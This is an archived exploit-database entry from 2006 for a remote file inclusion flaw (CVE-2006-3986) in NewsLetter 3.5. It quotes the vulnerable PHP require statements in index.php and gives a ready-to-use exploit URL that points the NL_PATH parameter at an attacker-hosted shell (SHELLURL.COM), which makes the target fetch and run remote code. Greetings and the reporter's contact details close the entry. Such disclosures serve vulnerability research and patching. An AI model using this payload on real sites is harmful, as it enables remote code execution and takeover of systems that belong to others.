NewsLetter <= 3.5 NL_PATH Remote File Inclusion Vulnerability

2006-08-01T00:00:00
ID EDB-ID:2097
Type exploitdb
Reporter SHiKaA
Modified 2006-08-01T00:00:00

Description

NewsLetter <= 3.5 (NL_PATH) Remote File Inclusion Vulnerability. CVE-2006-3986. Webapps exploit for php platform

                                        
                                            #=================================================================
#NewsLetter v3.5 &lt;= (NL_PATH) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://knusperleicht.at/                         |
#                                                                |
#Version : 3.5                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#      /**
# *     Erforderliche Datein einbinden
# */
#
#      require ("$NL_PATH"."inc/config.inc.php");
#      require ("$NL_PATH"."inc/engine.inc.php");
#
#/**
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?NL_PATH=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer

# milw0rm.com [2006-08-01]